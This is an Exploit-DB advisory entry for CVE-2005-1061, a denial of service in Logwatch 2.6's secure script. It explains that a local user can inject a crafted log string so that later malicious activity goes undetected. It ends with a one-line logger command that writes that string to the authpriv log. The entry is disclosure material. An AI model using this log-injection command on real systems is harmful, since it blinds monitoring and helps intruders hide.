Logwatch 2.6 Secure Script Denial of Service Vulnerability

2005-04-20T00:00:00
ID EDB-ID:25465
Type exploitdb
Reporter anonymous
Modified 2005-04-20T00:00:00

Description

Logwatch 2.6 Secure Script Denial Of Service Vulnerability. CVE-2005-1061. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/13273/info

Logwatch is prone to a denial of vulnerability in the secure script.

This issue may be exploited by a local attacker who can inject a malicious string into a log file, causing a denial of service condition. As a result, the utility may not detect subsequent malicious activity. 

ogger -p authpriv.notice '+++ connection closed by localhost +++'